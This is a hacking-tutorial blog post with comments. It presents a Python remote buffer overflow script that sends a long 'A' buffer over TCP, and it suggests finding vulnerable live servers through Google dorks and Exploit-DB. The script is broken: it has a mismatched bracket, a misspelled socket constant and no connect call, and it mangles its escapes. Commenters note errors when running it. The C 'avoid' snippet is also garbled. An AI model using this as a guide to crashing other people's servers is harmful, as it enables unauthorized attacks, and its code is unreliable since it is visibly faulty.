Remote Buffer Overflow Exploit with Python

Remote Buffer Overflow Exploit with Python


Hello, this time we are coding a Remote Buffer Overflow Exploit with Python that works with TCP only 🙂

You are going to need:

     – Python 3.4

     – Internet Connection

     – A vulnerable server

     – Computer with Windows or Linux

If you haven't got installed Python yet, download it from the following link:

You can find some of the Python basics in my previous tutorial at

Step by Step Coding Remote Buffer Overflow Exploit with Python:

1. Finding a server for testing

This is more complicated. Try searching for dorks at GHDB ( or for vulnerable software at Exploit-DB (

2. Coding

Coding is the easy part. Begin from importing sys and socket, then, write the following code:

for carg in sys.argv:

            if carg == "-s":

                        argnum = sys.argv.index(carg)

                        argnum += 1

                        host = sys.argv[argnum]

            elif carg == "-p":

                        argnum = sys.argv.index(carg)

                        argnum += 1

                        port = sys.argv[argnum[

buffer = "\x41"* 3000

s = socket.socket(socket.AF_INET, socket.SOCK_STRAEM)


s.send("USV " + buffer + "//r//n//r”)


Code should look like this:

Coding Remote Buffer Overflow exploiter with Python

Now, lets analyze the code. We already know the argument indentification script from my previous tutorial.  The second line makes a buffer, that is \x41 multiplied 3000 times. Then we see the lines of declaring s as socket, connecting with it, sending the buffer and closing the socket. Looks pretty hard, but it isnt.

After you have done these steps above, its time to test out our script!

Coding Remote Buffer Overflow exploiter with Python

As we see, the script work really great. I have tested it on one of my servers with vulnerable software. Good luck on h4x1ng!


How to avoid RBO

This depends on programming language. As example, on C, you can be vulnerable to remote buffer overflow if you use code like this:

int authed = 0;
char password_buffer[16];
strcopy(password_buffer, your_password)
if (strcmp(password_buffer, password) == 0) {
            authed = 1;
else {
            authed = 0;

So, once the your_password is over 16, you can implement auth overflow, or if there are even more, you can get buffer overflow with segmentation fault error.

So, as I have already mentioned, in various cases, the solution differs.

Written by : Vilius Povilaika

(Visited 12,702 times, 1 visits today)

Share this article if you found this post was useful:

Hacking Tutorial, Tips and Trick

See all posts by || Visit Website :

  • Artemix

    Hey, At the line :
    “port = sys.argv[argnum[”

    it’s “port = sys.argv[argnum]” !

  • Mark

    Doesn’t explain what the code actually does to the server.

    • jackova

      hahahah give a man a cookie

  • mahdi

    i am test this tutorial
    result :
    socket.gaierror: [Errno 11001] getaddrinfo failed